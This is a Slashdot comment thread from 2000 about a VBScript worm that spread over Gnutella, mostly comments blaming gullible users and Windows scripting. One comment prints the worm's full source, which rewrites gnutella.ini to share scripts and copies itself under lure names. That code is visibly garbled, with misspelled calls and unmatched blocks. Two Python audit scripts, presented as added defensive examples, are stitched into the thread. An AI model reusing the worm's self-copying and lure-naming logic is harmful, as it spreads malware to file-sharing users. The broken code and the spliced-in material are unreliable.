    Victim ID: 300E62E41438D411BA6F001061B08B89"

    And ALL the files are hosted by someone who only has a 28.8 connection.

    Do another search:
    Search for '.vbs'.
    ALL the files are hosted by someone only having a 28.8 connection as above.

    Conclusion:
    This Worm does not work, and the only person who is infected by this .vbs-script, is the person who wrote the damn thing.

  133. For a full listing of filenames... by TheSimon · · Score: 1

    Go Here

    Basically a complete description of the worm and the associated filenames.

  134. Re:Reminds me of this UNIX "virus" I recieved once by SomeOne2 · · Score: 1

    But that isn't really necessary, the file has just to lure the user to run it (a trojan perhaps) and then spread. On the other hand I could think of better ways to do this than Gnutella but it would be possible...

  135. Re:Gnutella is closed source, hence not secure by sterno · · Score: 1
    Open source != secure. Open source means that there is greater potential for people to look at it and make sure it is, but it requires people willing to go through that effort.

    ---

    --
    This sig has been temporarily disconnected or is no longer in service
  136. Nutella by truefluke · · Score: 1

    Actually it's a pun. And a pretty bad one, considering, these guys don't get the GNU sense of humour at all.

    (G)/Nutella (notice the slash). "Nutella" is a chocolate hazelnut spread, commonly put on toast.

    See? I told you it was lousy. :\

    --
    spam, spam, spam, spam, e-mail, news and spam.
  137. You need help boy!! by Wheely · · Score: 1

    But thanks for making /. a fun place to be.

    I vote for a /. archive of your posts!!

    Regards

  138. fnord by DavidTC · · Score: 1

    There is no message here.

    -David T. C.

    --
    If corporations are people, aren't stockholders guilty of slavery?
  139. CODE... by jyak · · Score: 1

    Option Explicit
    Dim CurrentFilename, CurrentGeneration, InfectionDate
    CurrentFilename = "ASF Compressor (No quality loss).vbs"
    CurrentGeneration = 14
    InfectionDate = "6/2/2000, 3:51:46 AM"

    '
    const ProgramName = "Gnutella Worm v1.1"
    const ProgramDate = "2000 May 21. I think that's the first Gnutella Worm."
    '
    '
    ' Watching CurrentGeneration will be quite interesting. I wonder if
    ' anyone ever studied this compared with real viral spreading.
    '
    ' 42
    '
    ' History
    '
    ' 1.1 o Now copies itself to a list of target keyword instead of just current filename
    ' o Fixed a but with Ini path... (1.0 didn't work at all. he he.)
    '
    ' 1.0 o Initial Release
    '

    ' Behavior Control Parameters
    Dim NewFilenames, GnutellaPath, GnutellaIni, VictimFilename
    NewFilenames = Array(ProgramName & ".vbs", "Jenna Jameson movie listing.vbs", "Pamela Anderson movie listing.vbs", "Asia Carerra movie listing.vbs", "xxx FTP movie listing.vbs", "ASF Compressor (No quality loss).vbs", "collegesex.vbs", "Gladiator.vbs", "Battlefield Earth.vbs", "Evangelion complete episodes scripts.vbs", "Scan Master checklist.vbs", "How to eat pussy.vbs", "Alicia Silverstone.vbs", "Pearl Jam.vbs", "Mp3 compressor (Half the size but same quality).vbs", "Napster Metallica Crack.vbs", "Santana.vbs", "NSync.vbs", "Nirvana.mp3.vbs", "Shania Twain.mp3.vbs", "Jesus loves you.vbs", "Gnutella upgrade.vbs", "OFFICIAL Gnutella Option Pack.vbs")
    GnutellaPath = "C:\Program Files\gnutella\"
    GnutellaIni = GnutellaPath + "gnutella.ini"
    VictimFilename = "Yet another GWV! " ' (Gnutella Worm Victim :)

    Const ForReading = 1
    Const ForWriting = 2

    Dim fso
    Dim SourceFile, DestinationFile
    Dim NewFilename
    Dim VictimName

    Function ModifyAndCopy
    ' Change Header data (New name, Generation number, any info passed down to the next Generation)

    DestinationFile.WriteLne(SourceFile.ReadLne)
    DestinationFile.WriteLne(SourceFile.ReadLne)

    DestinationFile.WriteLne("CurrentFilename = """ & NewFilenames & """")

    DestinationFile.WriteLne("CurrentGeneration = " & (CurrentGeneration + 1))

    DestinationFile.WriteLne("InfectionDate = """ & Date & ", " & Time & """")

    SourceFile.ReadLne ' Skip the ones we just wrote changed.
    SourceFile.Readlne
    SourceFile.Readlne

    ' Copy the rest of the file as-is
    Do While Not SourceFile.AtEndOfStream
    DestinationFile.WriteLine(SourceFile.ReadLine)
    Loop
    End Function

    Dim IniFile, IniFileDest
    Dim Line

    Set IniFile = fso.OpenTextFile(GnutellaIni, ForReading)
    Set IniFileDest = fso.CreateTextFile(GnutellaIni + "_", ForWriting)

    Do While Not IniFile.AtEndOfStream
    Line = IniFile.ReadLine

    if Left(Line, 8) = "extlist=" Then
    IniFileDest.WriteLine(Line + ";vbs")
    ElseIf Left(Line, 13) = "databasepath=" Then
    IniFileDest.WriteLine(Line + ";" + GnutellaPath)
    ElseIf Left(Line, 12) = "clientid128=" Then

    IniFileDest.WriteLine(Line)
    Else
    IniFileDest.WriteLine(Line)
    End If
    Loop

    IniFileDest.Close
    IniFile.Close

    fso.DeleteFile(GnutellaIni)
    fso.MoveFile GnutellaIni + "_", GnutellaIni

    End Function

    Function SignalVictim
    Dim Victim
    Dim Line
    Dim SignatureFilename

    SignatureFilename = GnutellaPath & VictimFilename & VictimName & ".zip"

    Set Victim = fso.CreateTextFile(SignatureFilename, ForWriting)

    Victim.WriteLne("Generation #: " & CurrentGeneration)
    Victim.WriteLne("Victim ID: " & VictimName)
    Victim.Writene("Infection date: " & InfectionDate)

    Victim.WriteLine("If I was a naughty boy, I could use scripting to get name, email, whatever file I want.")

    Victim.Close
    End Function

    Set fso = CreateObject("Scripting.FleSystemOjbject")

    If fso.FolderExists(GnutellaPath) Then
    For Each NewFilename in NewFilenames

    Set DestinationFile = fso.CreateTextFile(GnutellaPath + NewFilename, True)
    Set SourceFile = fso.OpenTextFile(CurrentFilename, ForReading)

    ModifyAndCopy
    ProcessIni
    SignalVictim

    SourceFile.Close
    DestinationFile.Close

    End If

    fso.DeleteFile(CurrentFilename)
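
The footprint of the script quoted above, turned into a defensive audit (an added example, not part of the thread or of any Gnutella client). The ini keys, install path and marker-file prefix come from that script; the function names, the script-extension list and all sample data are constructed for illustration.

```python
"""Audit a Gnutella install for the changes made by the script quoted above.

Added example. The ini keys (extlist=, databasepath=), the install path and
the marker-file prefix are taken from that script; function names, the list
of script extensions and all sample data are constructed for illustration.
"""
import ntpath
import re

# Extensions that Windows Script Host runs on a double-click.
SCRIPT_EXTS = {"vbs", "vbe", "js", "jse", "wsf", "wsh"}
# Harmless-looking types used as the inner half of a double extension.
DECOY_EXTS = {"mp3", "mpg", "mov", "avi", "asf", "jpg", "gif", "txt", "zip"}
INSTALL_DIR = "C:\\Program Files\\gnutella\\"   # GnutellaPath in the script
MARKER_PREFIX = "Yet another GWV!"               # VictimFilename in the script
MARKER_RE = re.compile(r"^(Generation #|Victim ID|Infection date):\s*(.+)$", re.M)


def _norm(path):
    """Compare Windows paths case-insensitively, ignoring a trailing slash."""
    return ntpath.normcase(ntpath.normpath(path.strip()))


def audit_ini(ini_text, install_dir=INSTALL_DIR):
    """Return (key, reason) findings for a gnutella.ini passed in as text."""
    findings = []
    for raw in ini_text.splitlines():
        key, sep, value = raw.strip().partition("=")
        if not sep:
            continue  # section headers, blank lines
        key = key.strip().lower()
        items = [v.strip() for v in value.split(";") if v.strip()]
        if key == "extlist":
            bad = sorted({e.lower().lstrip(".") for e in items} & SCRIPT_EXTS)
            if bad:
                findings.append((key, "script extensions shared: " + ",".join(bad)))
        elif key == "databasepath":
            if any(_norm(p) == _norm(install_dir) for p in items):
                findings.append((key, "program directory is being shared"))
    return findings


def classify_name(name):
    """Classify one shared file name; None means nothing suspicious."""
    base = ntpath.basename(name)
    if base.startswith(MARKER_PREFIX):
        return "victim-marker"
    parts = base.lower().split(".")
    if len(parts) > 1 and parts[-1] in SCRIPT_EXTS:
        if len(parts) > 2 and parts[-2] in DECOY_EXTS:
            return "double-extension"   # e.g. Nirvana.mp3.vbs
        return "script"
    return None


def parse_marker(text):
    """Extract the fields the script writes into its marker file."""
    return {k: v.strip() for k, v in MARKER_RE.findall(text)}


def audit(ini_text, filenames):
    """Combine ini findings with per-file verdicts for a directory listing."""
    verdicts = {n: classify_name(n) for n in filenames}
    return {"ini": audit_ini(ini_text),
            "files": {n: v for n, v in verdicts.items() if v}}


# --- constructed sample data (not captured from a real machine) ---
SAMPLE_INI_CLEAN = "\n".join([
    "extlist=mp3;mpg;avi",
    "databasepath=C:\\Shared",
    "clientid128=PLACEHOLDER",
])
SAMPLE_INI_MODIFIED = "\n".join([
    "extlist=mp3;mpg;avi;vbs",
    "databasepath=C:\\Shared;C:\\Program Files\\gnutella\\",
    "clientid128=PLACEHOLDER",
])
SAMPLE_LISTING = ["song.mp3", "Nirvana.mp3.vbs", "Gladiator.vbs",
                  "Yet another GWV! 0000.zip"]
SAMPLE_MARKER = ("Generation #: 14\r\n"
                 "Victim ID: 0000\r\n"
                 "Infection date: 1/1/2000, 12:00:00 AM\r\n")

if __name__ == "__main__":
    report = audit(SAMPLE_INI_MODIFIED, SAMPLE_LISTING)
    for key, reason in report["ini"]:
        print("gnutella.ini [%s]: %s" % (key, reason))
    for name, verdict in report["files"].items():
        print("%-30s %s" % (name, verdict))
    print(parse_marker(SAMPLE_MARKER))
```

To check a real install, pass the contents of gnutella.ini and `os.listdir()` of each shared directory to `audit()`.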

  140. VB != VBS by BoLean · · Score: 2

    Visual Basic and Visual Basic Scripting are two different animals.

  141. hrm by jbarnett · · Score: 2


    When I first was learning Linux, I got flamed a couple times because I was IRC-ing as root. Most IRC rooms ban people running as root, because it is well REALLY stupid to do. But what always made me mad, is sure they ban me for being stupid and running root, but they don't ban any Windows95/98 users. What is up with that?

    I don't run any user programs as root, only su into it when it is needed for system admin tasks, but I now know why it is stupid. Really stupid.

    --

    "`Ford, you're turning into a penguin. Stop it.'" -THHGTTG
  142. AC or not, mod this up. by Redking · · Score: 1

    Do it.

    --
    Rangers Lead the Way!
  143. Worm? Doesn't sound like it. by G27+Radio · · Score: 2


    Maybe I just read it wrong, but this is really kind of silly. You download something, then execute it. If it's malicious then you get screwed. Aren't there numerous FTP clients that allow you to execute what you've downloaded from within the client? What about IE 5.0? It allows you to execute the file you've downloaded from within the browser.

    This is just another VBS trojan like all the rest. It's not Gnutella's fault. Or do I misunderstand?

    numb

  144. Re:wrong wrong WRONG by GRAMMERSoft · · Score: 1
    "GNU" implies GPL

    "Gnu" is the name of an animal.

    If GNUtella is not doing this they must be corrected

    What are you going to do, sue them for trademark violation (woohoo!! I used the correct term!!!)

    Having said that, sir, I feel it is my obligation to inform you that you are, in fact, a baboon.

    --
    That said, I think it's time I changed my .sig (again)
  145. It's not totally integrated. by Redking · · Score: 1
    --
    Rangers Lead the Way!
  146. Re:Reminds me of this UNIX "virus" I recieved once by shren · · Score: 1

    Dammit! You've infected my system now. Why'd you have to dump this in a public forum where so many people would hit it?

    Where's my virus scanning software?

    --
    Maybe the state's highest function is to grind out insoluble problems. (Zelazny, Hall of Mirrors)
  147. my favorite is the html generating scripts by AugstWest · · Score: 2

    Every search you do through gnutella now comes back with an html page named [whatever-you-searched-for].html -- it's a page with javascript to load a porn site.

    It's just ironic when you're searching for something like Zappa and you end up at a britney spears porn site.

    Perfect metaphor for today's music industry. Last night during every commercial break Fox was touting britney as "The Voice of a Generation."

    heh. heheheheheh. hehehehehahahahahahahBAHAHAHAHAHAAAAAAA

  148. Blueberry pie recipes? by nezroy · · Score: 2

    While the network can be used to exchange any files, most files are pirated copies of music and software or porn.

    I thought the majority of file transfers on Gnutella were blueberry pie recipes...

  149. Re:Gnutella is closed source, hence not secure by technos · · Score: 5

    This is not a Gnutella issue. It's a weakness in Windows, one that has been exploited time and time again via email. This 'trojan' just happens to propagate via Gnutella.

    Oh, yeah. Kudos to the author. Novel delivery mechanism! Better than ILUVYOU and its attempt to spread via IRC!

    --
    .sig: Now legally binding!
  150. This all prooves MS is good for consumers!! by rmstar · · Score: 1

    Do you remember the old days? If you wanted to write a worm or a virus you had to know a lot of arcane stuff and code it in assembler.

    Today you use Microsoft Visual Basic, ActiveX, and use a Wizard. Ain't that nice, folks??

    rmstar

    patent pending for 3-click technology.

    1. Re:This all prooves MS is good for consumers!! by JakeS · · Score: 1

      In the old days there weren't as many folks stupidly running shell scripts handed them from unknown sources. This could have been done just as easily with pico and bash, but luckily most linux users have a bit more of a clue.

    2. Re:This all prooves MS is good for consumers!! by RedGuard · · Score: 1

      If you want to exploit bugs in MS operating
      systems you will still need a good grasp
      of assembler (or at least to be able to get an
      exploit from someone who has). If you want
      to write a malicious program you could write it
      in VBS, C, FORTRAN for any kind of computer.
      Trojan horse programs don't require any special
      knowledge other than a bit of social engineering
      and never have.

  151. The facts of life by Animol · · Score: 1

    It seems all too convenient that this is all coming around at once. With the "ILove You" thing and all, VBS is getting a really bad name for things like this. Gnutella happens to have a worm running through its system right now, but look on the bright side - like they say on their website, it must be user-executed (like most malicious proggies).

    All in all, yes, Gnutella won't be totally secure until it's totally open. But after all, it's not like they PLANNED on someone doing this. And if you're not rock-stupid, you shouldn't have a problem here. You take the good, you take the bad...

    --

    "I'm not even supposed to BE here today!"
  152. For you conspiracy nuts... by KilobyteKnight · · Score: 2

    ... Here's what's really going on: Microsoft is releasing all these worms themselves. They are trying to position VB Script as the most Elite, rad cool, programming language on earth... used by all the "big" hackers, crackers, and hell, the phreaks too.. Since they couldn't come out and openly advertise a product designed for hackers (what with that pesky lawsuit and all) they advertise by example...

    Yeah, that's the ticket.

    --
    When will Windows be ready for the desktop?
  153. Re:Troll? Maybe. by technos · · Score: 1

    There used to be a project for a Unix runtime environment for VB. It never quite got past the early stages, but even the early snaps were good enough to interpret uncompiled scripts..

    --
    .sig: Now legally binding!
  154. Reminds me of this UNIX "virus" I received once... by pjl5602 · · Score: 4
    <snip>
    This is a UNIX email virus. It works on the honor system:

    If you're running a variant of unix, please forward this message to
    everyone you know and delete a bunch of your files at random.

    Thank you for your cooperation.
    <snip>

    The only thing this Gnutella trojan can prey upon is an idiot user and there really isn't much one can do to protect against that.

  155. Re:This is proof that Linux is not immune by Masked+Marauder · · Score: 1

    I've heard that Corel will be using VB script in its office suite. Not yet, but soon. So at least there will be some sort of VB interpreter on Linux when that happens. I don't know if it will be accessible outside of the Corel suite.

  156. micro$oft strikes again w00t by mizhi · · Score: 2
    Heh, again, more security problems because of Microsoft's vbs engine. As I'm sure most people here realized, this worm will only affect windows machines. And windows machines run by people who aren't careful enough to check the script before they run it.

    But to be fair, it's basically the same old story from the old days when trojans, virii, and worms were distributed in .COM and .EXE files (for those of us who used DOS =) hell, there were even a couple .BAT trojans (not very effective but still)... you could download all you wanted and not a thing would happen until you ran them. Then again, that's what scan was for... =)

    You could have the same story with *nix though. What's to stop someone from writing a program that wipes out a user's directory? Or a sneaky bit of code in a program claiming to need access to root? I suppose the reason it doesn't happen as much in *nix land is because the users are generally more competent than people accustomed to simple point and click on M$ stuff; and incompetent people generally don't get root. =)

    I guess the point is, all it takes is someone dumb enough to run a script or program etc without checking it out. If you're not practicing safe computing, you'll get an STD (Stupidly Transmitted Disease).

    --
    Humorless sig goes here.
  157. Re:Gnutella is closed source, hence not secure by bibos · · Score: 2
    Since the whole Gnutella Protocol is completely open, it's perfectly easy to write your own open-source GNUtella clone,
    I see GNUtella as being 'open' by having the open protocol.

    And by the way it's a damn easy protocol. Seems like being designed for hobby programmers, and I don't think that's bad.
    The easier it is, the more likely it will get widely accepted.

    Check the GNUtella protocol out for yourself

  158. Join the grassroots movement..... by carlos_benj · · Score: 5
    ... to reclassify .VBS extensions to stand for "Virus Building System"

    carlos

    --

    As a matter of fact, I am a lawyer. But I play an actor on TV.

  159. Re:Gnutella is closed source, hence not secure by Biff+Cool · · Score: 3
    It's not a backdoor it's just downloading a file... Opening the source won't protect idiots from their own mouse buttons if they are dead set against clicking anything they can see.

    --

    Conscience is the inner voice which warns us that someone may be looking.
    -- H. L. Mencken

  160. Gnutella to blame? by finkployd · · Score: 2

    What if it put this on Freenet? Does it become a Freenet virus?
    How about on my web site? Then it's a WWW virus.
    Yeah, and I'll make it an FTP virus, an e-mail virus, and usenet virus....

    IT'S A VISUAL BASIC VIRUS!!!!! Wake up ZDNet!!!
    It's a single file. It can be transmitted in any one of the millions of ways files can be moved from point A to point B (including sneakernet)

    As long as there are people who repeatedly test how hot the stove is with their hand, see if a dog is nice by sticking their hand in its mouth and open vbs files on an operating system renowned for its insecurity, we will have this problem.

    People simply don't learn from the past. There is not much you can do but smile and charge them $100/hour for onsite service to fix the problems they create for themselves.

    Finkployd

  161. The _Real_ Reason these worms keep going by GrayMouser_the_MCSE · · Score: 2

    Dialog of a true phone conversation held this morning:

    (L)user: I just received an email titled: RESUME. Should I open it?

    Support: Did you ask for this resume to be sent to you?

    (L)user: No

    Support: Do you know the person who sent it to you?

    (L)user: No

    Support: Do you get resumes as part of your job function?

    (L)user: No

    Support: Then please delete the email without opening it.

    (L)user: Are you sure? I don't want to lose anything important?

    Actually, I considered it a not so small victory for training that the user called, but it shows the point. The biggest security hole in any operating system will always be the carbon interface banging on the keys. Once these users get loose on any system, security becomes much, much more difficult.

    The thought of possibly corrupting everyone's email must be weighed against the possibility of missing a funny chain letter... Anyone's guess who wins that one.

    (And yes, I freely acknowledge that MS makes exploiting these poor creatures incredibly easy, but it's only a matter of time before they move on to linux and other OS's)

    --
    Of course I use Microsoft. Setting up a stable unix network is no challenge ;p
  162. Re:Virus hackers becoming Microsoft'ed? by bubbles.utonium · · Score: 1

    Sure, it might be more impressive to make a new virus that infects the boot sector or executables, or wasn't a script ... but damn, I bet it's more satisfying to screw over Office or Outlook :)

  163. More interesting... by DeepDarkSky · · Score: 4
    I've used Gnutella and looked around for things, just typing them in, I was actually looking for the script of an animation film, and happened upon one of these files with the .vbs extension. Guessing that it must be some kind of VBScript virus, I downloaded it and renamed it to a .txt file and just looked at it using notepad (not that I really needed to rename it, but it was just to be safe, in case I accidentally double-click). It looked interesting enough, but I guess a lot of people do fall for it, even though the extension is not exactly hidden on it.

    There was something more interesting, though, that I discovered. Somewhere, someone figured out a way to take the search words that get sent out, and automatically create an HTML file from it. If you download it (as I have, a couple of times), thinking maybe it's an HTML file linking to some place that may have what you want, you'll find it's something else totally unrelated - somewhat akin to getting the xxx sites when searching for completely innocuous topics because they manipulated the search engines. Nonetheless, an unscrupulous person (relatively speaking, given the nature of Gnutella, and because after all, who would complain?) could link to a site full of banner advertising or some such to get hits.

  164. Same vein as ILOVEYOU by PimpDaddie · · Score: 1

    This "worm" is basically in the same vein as the ILOVEYOU virus and other email attachment viruses. They base their spreading and damage on 2 things. One, a distribution method. Two, the user executing the code voluntarily. In this case the method of execution is the same, a VBScript that is made to look like something it is not so that a user will execute it. The authors just replaced the distribution method of email and address books with GNutella and its distributed searching. This virus is really nothing new. Users should just remember not to blindly execute programs they download off the net. They should also check the extensions of files to make sure they are not scripts. Also, this virus does not expose any weakness of closed source Gnutella or expose any new weakness of Windows. It just exploits the same weakness that ILOVEYOU and the other VBscript viruses exposed in VBScript and Windows security.

    1. Re:Same vein as ILOVEYOU by Ranger+Bob · · Score: 1

      In this case the method of execution is the same...

      Not exactly. In the case of ILOVEYOU, Outlook would automagically execute the attachment when the user decided to view it (not always prompting for "Save or Open"). With this thing, the user actively thinks "I want that file", downloads it, and manually executes it.

      --
      "Widget choice makes me horny." -
  165. I got a benign variant of this... by mav[LAG] · · Score: 2
    As well as the payload it supplied a link:

    Here's how to disinfect yourself.

    --
    --- Hot Shot City is particularly good.
  166. When will this run on linux by Anonymous Coward · · Score: 2

    I mean ... with all the VBS files flying around when will somebody port Visual Basic Scripting support to linux. I am sick of having to run Windows just to get a VBS worm. Is somebody working on this already?

  167. Maybe I don't understand gnutella... by FascDot+Killed+My+Pr · · Score: 1

    ...but why is this a bad thing?

    Isn't file-sharing the POINT of gnutella? So when the guy says "I can get any file I want" isn't the response "Help yourself"? Surely anyone can change anyone else's gnutella.ini by just downloading it, modifying it and copying it back up?

    Of course, if gnutella is only supposed to make certain files available (in a sandbox, say) then this would be a problem--although a relatively minor one, yes?

    And so what if he's uploading viruses? People upload viruses to BBSs and FTP sites, too--that's why you have to be careful what you download and run. It's the "auto-run" aspect that makes a worm/virus dangerous.
    --
    Have Exchange users? Want to run Linux? Can't afford OpenMail?

    --
    Linux MAPI Server!
    http://www.openone.com/software/MailOne/
    (Exchange Migration HOWTO coming soon)
  168. Re:Huh? by jmpvm · · Score: 1

    Don't just assume that because it has "GNU" in it that the source is open. Because it is not.

  169. Virus hackers becoming Microsoft'ed? by iceT · · Score: 1

    Is it just me, or have the days of the 'really clever' viruses gone away. When was it that you last saw a new virus that infects the boot sector? How 'bout a virus that infects executables? How about a virus that was actually a BINARY, and not just a script? Viruses that infected binaries, but still allowed the binary to run... Remember the ones that used to corrupt the FAT table? Now THOSE were VIRUSES.

    Everything these days seems to focus on MS Office (Macro Viruses), VB Script, and Black Plagues' Flea of the 90's: Outlook/Outlook Express.

    Those were the days... :^D

    --
    -- You can't idiot-proof anything, because they're always coming out with better idiots.
  170. Virus to set security settings to paranoid? by eellis · · Score: 1

    I don't really know enough about VB to do this, but shouldn't it be possible to write an ILOVEYOU type thing that propagates around the world, setting everyone's security settings to maximum, (and optionally deleting wscript.exe, or whatever it is you need to run that kind of thing) so that no further viruses like this can happen?

  171. This is NOT a Gnutella problem... by Ranger+Bob · · Score: 1

    ...it's still a Windows problem. You could also do this with FTP-- *ANY* FTP server could cough up a copy of this file...

    --
    "Widget choice makes me horny." -
  172. At least we can narrow down who did it by adagioforstrings · · Score: 1

    to those people with bad grammar. :-)

  173. Novices... by nezroy · · Score: 1

    You're making the assumption that Gnutella cares about novices in some fashion, or is otherwise targeted to be an idiot's pirating tool. Well, from what I glean from their webpage and from usage of the program, both of these assumptions are completely invalid. Your arguments are true, but irrelevant.

    True because, yes, the freedom to host and grab whatever you want makes it more powerful, and thus more open to abuse. Irrelevant because users who care are more interested in a utility that is powerful and versatile than they are concerned about disruptions caused by abuses of that versatility.

  174. asm by jbarnett · · Score: 5

    Back in my day we didn't have any scripting language to code virii/worms in, we had to do it in hard code ASM, by hand, without an assembler, in the middle of winter, without power in middle of a frozen lake. Back then, there wasn't "documentation", we had to reverse engineer the processor to get the correct op codes, then write our own assembler.

    Then when we wanted to run the file, we had to transfer it via 340K 5 1/4 floppy disk, we didn't have networks, the Internet or fancy hard drives.

    Then once the floppy was in the users machine, we had to call up and have the user run 4 different executables, this took a lot of social engineering.

    Seriously though, who says Microsoft isn't innovative? If you want to write a virii/worm for DOS you needed ASM or C/C++, which is difficult for the typical script kiddie to understand. Hand someone a Visual Basic for dummies book and within a week they have a worm that can propagate around the Internet within a matter of days. Thank you Microsoft for your weak security permissions and easy to use high power octane scripting language.

    Seriously though, if Microsoft wanted to make it more secure, give it user permissions like Unix, but if they want to keep it easy to use, have a popup box when something (program/script/command) wanted to access/write/read another user's file and say "This program needs to run at a different user level: level foo, are you sure you want to run this?" and when they click "ok" it gives them a popup box to enter username/password for level foo and if they are entered correctly it runs the program with higher permissions. Easy to use and somewhat secure. Just have Unix or Unix like permissions, with the ease of use of Microsoft's pop up and dialog boxes, the user won't even have to touch the command line (btw command.com sucks compared to bash, and edit is pathetic compared to vi, I wouldn't wish Microsoft's command line interface on my worst enemy)

    --

    "`Ford, you're turning into a penguin. Stop it.'" -THHGTTG
  175. Not a gnutella weakness, but rather a user weaknes by Manuka · · Score: 2
    This thing doesn't actually exploit anything in gnutella proper, but rather the dumbshit user and the weak OS he's running. For this thing to actually propagate, the user has to:

      a) Manually select the file for download, with its VBS extension glaring in their face

      b) Manually go into the Gnutella download directory and execute it.

    In other words, if you get "infected" by this thing, it's your own damned fault.
  176. Visual Basic does exist for Linux now.... by Midnight+Ryder · · Score: 1

    It's already somewhat available. Check out , which is basically Visual Basic for Applications on Gnome (and if it gets done for the Gnome environment, it will get ported around.)

    Michael Meeks & co. is doing the job right, however. GB is designed to be a lot more secure than VBA is currently. Personally, I'm dying to see this get completed - I can finally start moving the company way from MS based product to Gnome's Excel-alike. You'd be surprised how much use VBA gets in Excel, and a replacement that covers both Excel and the VBA scripting engine is going to go a long way to moving larger offices over to Free Software / Open Source equivalents.

    For those who are really interested - this is VBA, not really VB. There is no Visual Basic IDE for Linux planned. At a later date it's supposed to do Gnome Basic -> C conversion.

    And while many people here hate Visual Basic, I'm still a fan of it :-) I'm really happy to see the same thing for Linux coming!

    --

    Davis Ray Sickmon, Jr - looking for something to read? Check out my three free novels at MidnightRyder.org

    1. Re:Visual Basic does exist for Linux now.... by Midnight+Ryder · · Score: 1

      Damn... didn't get that link closed properly - sorry!

      --

      Davis Ray Sickmon, Jr - looking for something to read? Check out my three free novels at MidnightRyder.org

  177. GIAC by craw · · Score: 1

    I think that this is related to this story. Check out this report at SANS Global Incident Analysis Center. The source is listed as the second incident report. BTW, GIAC is a good source of info about what seems to be the port scan du jour.

  178. A point by Greyfox · · Score: 4
    This is why whenever anyone says wistfully that we need MS Office on Linux, you should kick them square in the nuts.

    I don't believe you'll find a less security-aware company on the face of the planet. If they did port Office to Linux I have no doubt in my mind that it'll need root privs, and include all the happy horseshit that's been getting Windows users infected for years.

    You can keep MS and the viruses that come with them.

    --

    I'm trying to teach myself to set people on fire with my mind... Is it hot in here?

  179. Network Associates Worm Tech Info... by Linkmastah · · Score: 2

    Here's a link to Network Associates' (makers of Dr Solomons' and McAfee VirusScan) technical info on the Gnutella Worm, which also contains a complete listing of all the filenames created by the worm. Eerily, it's virus number 98666 on their database.

  180. Re:Why is this a "VBScript thing"? Remember sirc2? by Anonymous Coward · · Score: 1

    Remember sirc2 or whatever, the quasi-irc client that allowed spoofed connections? This reminds me of what I did back in 1996 when I was doing my first unix administration (Slackware Linux).. I was a big IRC freak, and someone on IRC offered sirc2 source code, which was big news cause it was private. What they didn't document in their dcc offer is that it was trojaned to compile a trojanned login program, and replace your existing login with a backdoor so that you could login as "phat" or something and get in as root. And it'd conveniently email the guy.. Since it did packet spoofing, it of course needed to be run as root. So file permissions were useless. Of course, I didn't run an untrusted executable, I compiled it! I didn't read the source though, till after I noticed that the sirc2 source directory nuked itself. This is cause there was a nice exec() of rm * when it was run before it emailed off. Once I noticed the directory was blank, I went through the source code. I of course, closed it up right when I read the source and found the exec, but 17 minutes later, someone from Canada tried to login. This was a fantastic case of user education. Trojans can even affect Linux users who compile source code, even with tight file permissions. This is the closest I ever got to being rooted. I was sure paranoid after that point. I screen any script or source I get off of IRC now. --helixblue.

  181. Humans weak. Grunt, grunt. by ptbrown · · Score: 1

    What really amuses me is the files that are named "*.mp3.htm". Which, of course, when viewed in WinExploder with the "dummy-me-is-afraid-of-extensions" mode, will hide the ".htm" causing some idiot somewhere to think it's an mp3 file even though it *Clearly Has The Icon* of an html file.

    <RANT>
    I mean, the mindless masses got all excited when they were presented with a GUI and no longer needed to use the command line, but then they don't utilise any of the features the GUI gives them. Look at the state of drag-and-drop in Windows, it works in MS apps and maybe a dozen others, but is nothing near universal -- Why? Because the lusers don't realise that d'n'd is there and don't use it and thus, developers don't have any incentive to implement it properly. So the next time you curse MS for having a bass-ackward interface, remember that it sucks because they're marketing towards people who don't know it sucks... Then curse MS for not taking the leadership role and failing to adequately introduce the new technologies to the users. (God forbid you actually have to learn something to use a computer.) This is why these VBS trojans are so effective in being spread; the mindless masses don't realise what a .vbs file is, Microsoft never having told them. If MS had educated the public more about VBS and WSH, more people would know what they do, and would be less prone to open them without thinking it might not be a good idea. So now MS is forced to cripple their product to "protect" the lusers from their own ignorance -- an ignorance that MS encourages.
    </RANT>

    --
    Any sufficiently advanced civilization is indistinguishable from Gods.
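
A filename check for a shared download directory that catches the two cases raised in this thread: a bare .vbs file, and a name like *.mp3.htm whose real extension Explorer can hide. This is an added example, not part of any comment or of Gnutella; the extension lists and sample names are constructed assumptions.

```python
import os
import sys

# Extensions that Windows Script Host runs on double-click.
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh"}
# Extensions Windows launches directly as programs.
PROGRAM_EXTS = {".exe", ".com", ".bat", ".cmd", ".scr", ".pif"}
# Extensions a user expects to be passive content (constructed list,
# adjust to what your users actually download).
DECOY_EXTS = {".mp3", ".wav", ".avi", ".mpg", ".jpg", ".gif",
              ".txt", ".doc", ".zip"}

# Constructed sample names, used when no directory is given.
SAMPLE_NAMES = [
    "holiday_song.mp3",
    "holiday_song.mp3.htm",
    "movie_script.vbs",
    "readme.txt.VBS ",
    "backup.tar.gz",
    "setup.exe",
]


def classify(name):
    """Return a finding dict for one filename.

    verdict is "block" for anything Windows would execute, "review" for a
    passive-looking extension hidden in front of a different real one,
    and "ok" otherwise.
    """
    # Win32 drops trailing dots and spaces, so they must not mask the
    # real extension.
    clean = name.rstrip(". ")
    stem, real = os.path.splitext(clean)
    real = real.lower()
    inner = os.path.splitext(stem)[1].lower()

    reasons = []
    if real in SCRIPT_EXTS:
        reasons.append(f"{real} is run by Windows Script Host on double-click")
    elif real in PROGRAM_EXTS:
        reasons.append(f"{real} is launched as a program")
    executable = bool(reasons)

    # "song.mp3.htm": with "Hide extensions for known file types" on,
    # Explorer shows only "song.mp3".
    if inner in DECOY_EXTS and real not in DECOY_EXTS:
        reasons.append(f"{inner} sits in front of the real extension {real}")

    verdict = "block" if executable else ("review" if reasons else "ok")
    return {
        "name": name,
        "shown_as": stem if real else clean,  # name with the last extension hidden
        "verdict": verdict,
        "reasons": reasons,
    }


def scan(names):
    """Classify every name and return only the findings that need attention."""
    return [f for f in map(classify, names) if f["verdict"] != "ok"]


if __name__ == "__main__":
    # Usage: python check_names.py [download_directory]
    names = os.listdir(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_NAMES
    for finding in scan(names):
        print(f'{finding["verdict"]:6} {finding["name"]!r} '
              f'(shown as {finding["shown_as"]!r}): '
              + "; ".join(finding["reasons"]))
```
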
  182. Gullibility Virus by jabber · · Score: 1

    WARNING, CAUTION, DANGER, AND BEWARE!
    Gullibility Virus Spreading over the Internet!

